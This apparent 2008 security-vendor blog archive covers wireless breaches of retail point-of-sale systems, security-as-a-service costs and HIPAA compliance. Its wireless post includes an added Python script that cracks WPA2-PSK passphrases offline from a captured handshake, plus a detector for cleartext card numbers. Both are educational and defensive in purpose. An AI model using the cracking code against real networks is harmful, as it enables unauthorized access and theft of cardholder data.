Content Migration

September 25, 2008


The content of this blog will be moving to Therefore, you can find new and interesting posts at or from this point on.


Anatomy of a Data Breach Part 3 – The Wireless Hack

July 17, 2008

Wireless networks and endpoints offer convenience and connectivity. Unless properly secured, they also offer an attacker a way into the network. This article describes the vulnerabilities and strategies for mitigating them.

In the wake of data breaches that went undiscovered for long periods before their public exposure, attackers have turned their attention to wireless networks and the many weaknesses inherent in them. We are also seeing a trend towards stealing cardholder data from retailers such as TJX and Hannaford Brothers as a quick path to profit.

Wireless networks are a common way of providing employees with access anywhere, anytime across the corporate campus. However, they come with several often-ignored dangers:

• Exploitation of weak or broken encryption protocols (WEP, and WPA-PSK with a guessable passphrase).

• Impersonation of access points and interception of wireless traffic.

• Access points deployed with little or no security enabled.

Any of these vulnerabilities can lead to the exposure of private information if it is not accounted for when implementing a data security policy. An exposure through one of them can also put an organization in violation of PCI DSS, HIPAA or SOX. These regulations were designed to protect specific classes of information whose exposure carries serious consequences: fines, potential jail time and a host of other unwanted after-effects.

The Target: Wireless Point-of-Sale (POS)

For example, the protection of cardholder data under PCI DSS includes a number of requirements that aid in developing a policy that (a) protects cardholder data stored on servers and (b) protects cardholder data in transit, such as transactions flowing from front-end point-of-sale terminals to back-end merchant processing servers (the machines that handle and authorize a transaction when a card is swiped at a store).


Because the target is often cardholder data, which has a higher raw value on the black market than other information such as a Social Security number, attackers are developing strategies built around breaching wireless networks. It is far easier to penetrate a weakly secured wireless network than to get through the corporate firewall and in via the external gateway.

A wireless foothold is a stepping stone to harvesting data not only at rest but in motion as well. The methodology follows the "low-hanging fruit" principle and is part of an emerging trend toward gaining access to cardholder data.

Cracking the Wireless Network

Wireless attacks accounted for around 9% of the security incidents documented in a recent report published by the Verizon Business Risk team. This is likely due to incorrectly configured access points or the use of weak authentication. WPA-PSK is vulnerable to an offline dictionary attack: once an attacker has captured a single four-way handshake, passphrase guesses can be tested against it without sending another packet to the access point, so a weak passphrase falls given enough time. WEP, on the other hand, can be cracked in less than 10 minutes using freely available tools, regardless of how strong the key is.

For a wireless attack to succeed without a large investment of time and resources, the access point either has to use a vulnerable encryption protocol (WEP, or WPA-PSK with a weak passphrase) or have no security enabled at all, which has been seen in the field numerous times.
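To make the WPA-PSK weakness concrete, the following added example (not code from the original post) simulates the offline dictionary attack described above. It builds the WPA2-PSK key hierarchy from the 802.11i standard (PMK from PBKDF2 over the passphrase and SSID, PTK from a PRF over the two MAC addresses and nonces, and the EAPOL-Key MIC as HMAC-SHA1 under the KCK), "captures" a four-way handshake from an access point with a known passphrase, then tests wordlist candidates against the captured MIC without any further contact with the access point. The SSID, MAC addresses, nonces, passphrases and wordlist are all constructed for the demo; a real attacker would take these fields from a sniffed handshake.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-384 over the ordered MAC addresses and nonces; the first 16 bytes of the
    # PTK are the KCK, the key that authenticates the EAPOL-Key frames.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 * 20 bytes of SHA1 output covers the 48 bytes needed
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([i])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:48]


def build_eapol_msg2(snonce: bytes) -> bytearray:
    # Constructed EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed.
    frame = bytearray(99)
    frame[0:4] = b"\x02\x03\x00\x5f"  # EAPOL v2, type EAPOL-Key, body length 95
    frame[4] = 0x02                   # descriptor type: RSN
    frame[5:7] = b"\x01\x0a"          # key info: MIC set, pairwise, HMAC-SHA1-AES
    frame[7:9] = b"\x00\x10"          # key length 16 (CCMP)
    frame[17:49] = snonce             # Key Nonce field carries the SNonce
    return frame


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # WPA2: MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC field zeroed)
    zeroed = bytearray(frame)
    zeroed[MIC_OFFSET:MIC_OFFSET + 16] = bytes(16)
    return hmac.new(kck, bytes(zeroed), hashlib.sha1).digest()[:16]


def capture_handshake(ssid: str, passphrase: str) -> dict:
    # Stand-in for a sniffed handshake: the AP and client are simulated here so
    # the example runs offline. Only the fields an attacker can see are returned.
    aa = bytes.fromhex("00112233aabb")   # constructed AP (authenticator) MAC
    spa = bytes.fromhex("66778899ccdd")  # constructed client (supplicant) MAC
    anonce = bytes(range(32))            # constructed nonces
    snonce = bytes(range(32, 64))
    frame = build_eapol_msg2(snonce)
    kck = derive_ptk(derive_pmk(ssid, passphrase), aa, spa, anonce, snonce)[:16]
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": bytes(frame)}


def crack_psk(hs: dict, wordlist):
    # Offline attack: every candidate is checked against the captured MIC alone,
    # so the access point never sees a failed attempt and cannot rate-limit it.
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = derive_pmk(hs["ssid"], candidate)
        kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


# Constructed wordlist; real attacks use lists with millions of entries.
WORDLIST = ["password", "store1234", "register01", "wireless", "welcome1"]

if __name__ == "__main__":
    weak = capture_handshake("POS-WLAN", "register01")
    print("weak passphrase recovered:", crack_psk(weak, WORDLIST))
    strong = capture_handshake("POS-WLAN", "Tq7!vM2#rX9pLw4e")
    print("strong passphrase recovered:", crack_psk(strong, WORDLIST))
```

The cost per guess is fixed by the 4096 PBKDF2 iterations, which is why the only effective mitigations for a PSK deployment are a long random passphrase (the second handshake above is never recovered) or moving the POS segment to WPA2-Enterprise with per-user credentials.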

As data security becomes the number one problem, attackers will continue to innovate and find additional ways of getting at the information they want. Penetrating a wireless network and planting targeted malware has only recently emerged and is expected to increase, especially since cardholder data is one of the primary targets of interest when it comes to data of value.

One popular method being used today is the development of targeted malware that intercepts transmissions and extracts credit card numbers and other sensitive data directly from those streams.

However, it all starts with penetrating the wireless network and gaining access to its resources. As we have seen, the weakest link in the chain is often targeted first (stores or regional offices in the field). Some recent breaches have ended with malware installed on key servers, and the avenue of attack was the wireless network at a field office.

One theory on how this malware works is that it uses filters to pick out packets carrying specific information (credit card numbers, Social Security numbers, authorization codes and PINs, all of which have value). Another is that it captures the details in real time through Trojans that interact directly with the application on the POS terminal, capturing the customer's information as it leaves the POS for the payment authorization gateway.


Once the malware has captured the data, it opens a channel to a command-and-control server and uploads the stolen information. The C&C server is often also connected to thousands of compromised consumer PCs, and the stolen data is distributed to and stored on those machines. The chilling part is that any consumer's PC, once compromised, can instantly become a drop-box for stolen corporate information.

As mentioned before, attackers target wireless networks at smaller regional offices, as they did with Hannaford and TJX, on the assumption that security there is weaker than at corporate headquarters; such sites are part and parcel of the "low-hanging fruit". This is probably true given the limited technical resources available at smaller locations and the variety of equipment and configurations they run.

Discovery and Prevention

Determining whether you have been breached is difficult, as intruders will likely have covered their initial entry by removing the traces (deleting or tampering with audit logs, etc.). Therefore, the best approach is a strategy for detecting a breach and mitigating its effects, such as:

• Database monitoring: Technologies exist to monitor SQL Server and Oracle databases for suspicious activity (access by unauthorized users, insertion of scripts, execution of unusual SQL statements, etc.). Monitoring is only part of the equation in detecting a breach in progress, but if the attackers decide to access cardholder data stored in your databases in addition to extracting it in real time, database monitoring increases the odds of discovering the unauthorized access.

• Network intrusion detection: Intrusion detection systems, alongside other methods, can detect anomalous traffic and behaviour associated with an attack. On the wireless side this should include scanning for rogue or misconfigured access points and watching for cardholder data crossing the network in the clear.

• Hardening critical assets: You can minimize exposure and risk by hardening critical assets (in this case the POS terminal), that is, removing non-essential services, applications and open ports that not only add complexity but introduce additional risk.
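The packet-filtering theory above (malware picking card numbers out of the POS stream) and the network intrusion detection bullet rest on the same observation: a card number in cleartext is easy to recognize. The following added example, which is not code from the original post, shows the detection side of that check as an IDS or DLP rule would run it over captured POS payloads: it finds 13 to 19 digit candidates (with or without separators), validates them with the Luhn checksum so that order numbers and other digit runs do not fire, and reports masked PANs. The payloads are constructed and use the well-known Visa and Mastercard test numbers; anything this rule matches on a wireless or POS segment is cardholder data in transit that PCI DSS requires to be encrypted.

```python
import re

# Candidate PAN: 13-19 digits, optionally separated by single spaces or dashes,
# not adjacent to other digits (so a longer digit run is not split into pieces).
PAN_RE = re.compile(rb"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    # Luhn (mod 10) checksum: every second digit from the right is doubled.
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(payload: bytes) -> list:
    # Return every Luhn-valid card number in a payload, normalized to bare digits.
    found = []
    for m in PAN_RE.finditer(payload):
        digits = re.sub(rb"[ -]", b"", m.group()).decode()
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def mask_pan(pan: str) -> str:
    # Keep only the first six and last four digits in alerts, as PCI DSS allows.
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed POS payloads for the demo (test card numbers, not real accounts).
SAMPLE_PAYLOADS = [
    b"POS01|PAN=4111111111111111|EXP=1012|AMT=4599|AUTH=?",  # authorization request
    b";5555555555554444=1012101123?",                         # track-2 style data
    b"ORDER=1234567890123456|STATUS=OK",                      # 16 digits, fails Luhn
    b"Card: 4111-1111-1111-1111 Exp: 10/12",                  # receipt text
]


def scan_stream(payloads) -> list:
    # Emit (payload index, masked PAN) for every cleartext card number seen.
    alerts = []
    for idx, payload in enumerate(payloads):
        for pan in find_pans(payload):
            alerts.append((idx, mask_pan(pan)))
    return alerts


if __name__ == "__main__":
    for idx, masked in scan_stream(SAMPLE_PAYLOADS):
        print(f"ALERT: cleartext PAN {masked} in payload {idx}")
```

Payload 2 is the reason for the Luhn step: a naive "16 digits" filter would flag the order number, while the attacker's own filter and a defender's rule both need the checksum to keep false positives down. Run against a mirror of the POS VLAN, any alert from this rule means either an unencrypted transaction path or a breach already exfiltrating data.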

Yesterday’s Webinar Available!

May 22, 2008

Yesterday’s webinar on Customer Privacy, Malware and Government Regulations is now available for your viewing pleasure. Enjoy!



Why Security-as-a-Service reduces total cost of ownership (TCO)

May 22, 2008

Recently I have been getting a number of questions concerning the cost savings of a security-as-a-service (SaaS) model versus a traditional on-premise solution. While there are certainly a number of direct benefits to the end user (easier to use and easier to upgrade), for the purpose of this article I want to elaborate on the most important one: reducing the total cost of ownership (TCO) by outsourcing security services.

So what exactly is meant by reducing the total cost of ownership? According to industry analysts, a good portion of small to medium-sized companies outsource their security services to a third-party provider. This strategy has real benefits, especially for companies that lack the technical ability to manage and maintain an on-premise anti-malware solution.

Because SaaS does not reside on-premise, it takes the overhead of managing and maintaining a complex myriad of technologies and places the responsibility with the provider. Take for example a small Medicare facility with 100 employees; if we factor the following variables into the equation and apply them to a SaaS model, the reduction in TCO is clear:

Direct costs with an on-premise solution:

* 2 hrs to install the management server at $200 per hr (average technical consultation fee) = $400

* $1000 to $1500 for hardware (necessary for the management server)

* $800 to $1000 for Microsoft Windows 2003 Server licenses

Overall initial cost (not including the anti-malware licenses or the yearly technical support contracts for the various products, i.e. the server, the anti-malware product, etc.) = $2,200 to $2,900

Direct costs with a SaaS solution:

A SaaS solution has no direct infrastructure or on-going management costs, as these are outsourced (the only cost is the anti-malware subscription). An on-premise solution has much higher initial and on-going costs: hardware requires maintenance, and because there is a lack of technical skill in-house, outside help is needed to maintain the anti-malware product.

In conclusion, SaaS promises to reverse the trend and reduce costs while helping mid-size companies achieve security within their budgets.


Eleven months of writing for the Information Systems Security Association Journal

May 20, 2008

I have now been writing for eleven months in the Information Systems Security Association (ISSA) Journal. These articles have been primarily focused on sharing information concerning the emerging threat landscape and what we are seeing from a Panda Security perspective. Therefore, I thought I would share a little history with you by making these articles available for download.

* The Crimeware Ecosystem

* Targeted Scams: A new Trend

* From Traditional AV to Collective Intelligence

* The Silent Epidemic (the very first article)

* Targeted Financial Attacks

* Server-Side Polymorphism

Thoughts or comments?


Webinar on Privacy and Security – Win a Garmin GPS!

May 20, 2008

Free Live Webinar on May 21 @ 10AM PST / 1PM EST

New breeds of malware – spyware, adware, Trojans, and viruses – are rapidly infecting networks and exposing businesses and their customers to unprecedented security risks. The government is now mandating that corporations effectively protect the privacy of individuals and ensure the confidentiality and integrity of sensitive information.

Protect Your Corporate Information and Assets!

Get 16 tips to help you protect your corporate network from malware threats:

• 3 ways to safeguard against malware threats and comply with regulatory standards
• 5 technical safeguards that will significantly reduce your enterprise’s risk
• 3 ways to measure inadequacies during a security audit and whether assets are already compromised with undetected malware
• 5 ways to evolve security best practices for crimeware and potential infection targets

and Panda Security US have partnered to offer you this exclusive FREE live webinar.

Join us for a chance to win
Attendees to the live webinar will be entered for a chance to win a Garmin GPS. One winner will be selected from the audience by random drawing.*



How regulations affect small to mid-size companies

May 20, 2008

It's important to note that not only large corporations are affected by regulatory standards; small and mid-size companies are equally affected, especially when their core business deals with classes of information protected by law (patient information, credit card information, financial data, etc.).

A very good example is a regional Medicare facility with fewer than 500 employees. One may think that it is not subject to the same regulations because of its size, but HIPAA is HIPAA, and it applies to any organization that stores and maintains protected patient information.

For example, if this fictional Medicare facility had a screen-logger on a PC holding any of the above classes of information, it could be in violation of the following and could face fines:

HIPAA Security Rule §164.312(a)(1) (Access Control), which pertains to protecting health information: "implement technical policies and procedures for electronic information systems that maintain electronic protected health information to allow access only to those persons or software programs that have been granted access rights as specified in §164.308(a)(4) [Information Access Management]"

It also leads me to believe that controls implemented to enforce compliance do not always provide assurance that one is protected. This is particularly true in light of the recent high-profile data breaches at corporations that had followed regulatory standards but were somehow still compromised.

In conclusion, security should not be ignored within small and mid-size companies, especially those that handle protected classes of information.